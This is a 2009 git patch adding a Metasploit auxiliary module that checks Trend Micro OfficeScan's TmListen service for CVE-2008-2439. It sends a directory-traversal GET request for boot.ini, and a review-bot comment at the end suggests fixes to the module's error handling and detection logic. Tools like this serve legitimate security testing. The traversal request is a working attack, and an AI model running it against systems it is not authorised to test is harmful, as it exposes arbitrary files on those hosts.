From a2da72c0eb9707997d029ef6b87332ba436490dc Mon Sep 17 00:00:00 2001
From: Patrick Webster
Date: Mon, 5 Jan 2009 05:18:42 +0000
Subject: [PATCH] Added tmlisten_traversal aux module from Anshul Pandey.
git-svn-id: file:///home/svn/framework3/trunk@6075 4d416f70-5f16-0410-b530-b9f4589650da
---
.../admin/officescan/tmlisten_traversal.rb | 66 +++++++++++++++++++
1 file changed, 66 insertions(+)
create mode 100644 modules/auxiliary/admin/officescan/tmlisten_traversal.rb
diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb
new file mode 100644
index 0000000000..64edd3cd2a
--- /dev/null
+++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb
@@ -0,0 +1,66 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module tests for directory traversal vulnerability in the UpdateAgent
+ function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro
+ OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM
+ via dot dot sequences in a HTTP request.
+ },
+ 'References' =>
+ [
+ [ 'OSVDB', '48730' ],
+ [ 'CVE', '2008-2439' ],
+ [ 'BID', '31531' ],
+ [ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ],
+ ],
+ 'Author' => [ 'Anshul Pandey ', 'patrick' ],
+ 'License' => MSF_LICENSE
+ )
+
+ register_options(
+ [
+ Opt::RPORT(26122),
+ ], self.class)
+ end
+
+ def run_host(target_host)
+
+ res = send_request_raw({
+ 'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
+ 'method' => 'GET',
+ }, 20)
+
+ if (res.code >= 200)
+ if (res.body =~ /boot/)
+ vuln = "vulnerable."
+ else
+ vuln = "not vulnerable."
+ end
+ if (res.headers['Server'])
+ print_status("http://#{target_host}:#{rport} is running #{res.headers['Server']} and is #{vuln}")
+ end
+ end
+ end
+end
\ No newline at end of file
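Review bot: `res.code` in `run_host` is dereferenced without checking that `send_request_raw` returned a response, so a host that refuses the connection or exceeds the 20-second timeout would most likely raise NoMethodError on nil mid-scan; add `return unless res` before the status check. The verdict is also loose: `res.code >= 200` accepts every HTTP status and `/boot/` matches an error page that merely echoes the requested `boot.ini` path, so patched hosts can be reported as vulnerable; prefer `if res.code == 200 && res.body =~ /\[boot loader\]/i`. Finally, the result is printed only when a `Server` header is present, so a positive finding on a host that omits the header is silently dropped; print the verdict unconditionally and include the banner only when it exists.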